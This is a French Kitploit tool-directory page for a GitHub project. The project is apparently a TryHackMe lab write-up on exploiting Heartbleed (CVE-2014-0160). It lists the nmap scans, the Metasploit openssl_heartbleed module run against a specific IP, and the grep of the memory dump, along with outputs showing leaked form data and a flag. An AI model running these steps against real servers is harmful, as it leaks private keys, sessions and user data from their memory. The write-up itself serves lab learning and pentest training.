Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — L'objectif de ce projet était d'évaluer un hôte distant pour la vulnérabilité Heartbleed (CVE-2014-0160), de vérifier sa présence et de l'exploiter pour extraire des informations potentiellement sensibles de la mémoire du serveur via le protocole TLS. | Kitploit
Outils/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Criminalistique MémoireAnalyse des VulnérabilitésExploitationCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

L'objectif de ce projet était d'évaluer un hôte distant pour la vulnérabilité Heartbleed (CVE-2014-0160), de vérifier sa présence et de l'exploiter pour extraire des informations potentiellement sensibles de la mémoire du serveur via le protocole TLS.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
6il y a 1 anPas encore vérifié

Objectif

L'objectif de ce projet était d'évaluer un hôte distant pour la vulnérabilité Heartbleed (CVE-2014-0160), de vérifier sa présence et de l'exploiter pour extraire des informations potentiellement sensibles de la mémoire du serveur via le protocole TLS.

Exécution

  1. Identification des services ouverts (Nmap) nmap -sC -sV 52.215.184.158 Résultat :
root@kitploit:~
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4
111/tcp open  rpcbind  2-4
443/tcp open  ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after:  2020-02-16T10:41:14

Le certificat TLS était auto-signé et expiré. Cela a soulevé des soupçons sur le fait que la version d'OpenSSL pourrait être obsolète. Port cible : 443.

  1. Vérification de la vulnérabilité Heartbleed (script Nmap) nmap -p 443 --script ssl-heartbleed 52.215.184.158 Résultat :
root@kitploit:~
| ssl-heartbleed:
|   VULNERABLE:
|     OpenSSL 1.0.1 is vulnerable to Heartbleed
|     State: VULNERABLE
|     Risk factor: High
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

La cible est confirmée vulnérable à Heartbleed.

  1. Exploitation (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Résultat :
root@kitploit:~
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin

La mémoire a été déchargée avec succès et stockée localement pour analyse.

  1. Analyse du dump mémoire strings openssl.heartble_152689.bin | grep -i "THM{" Résultat :
root@kitploit:~
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}

Des données confidentielles, y compris un flag applicatif, ont été extraites avec succès de la mémoire TLS — confirmant que la vulnérabilité peut être exploitée pratiquement pour divulguer des informations sensibles.

Conclusion

J'ai identifié et exploité avec succès CVE-2014-0160 sur un serveur distant. Le processus comprenait :

  • Détection de la vulnérabilité avec nmap
  • Exploitation de la faille avec Metasploit
  • Extraction de données utilisateur en direct (y compris le flag THM{sSl-Is-BaD}) de la mémoire

Impact commercial

La présence de Heartbleed dans un système exposé publiquement pose un risque critique :

  • Fuites potentielles de clés privées TLS
  • Détournement de session
  • Exposition de noms d'utilisateur, d'e-mails et de saisies utilisateur sensibles
Télécharger l’outil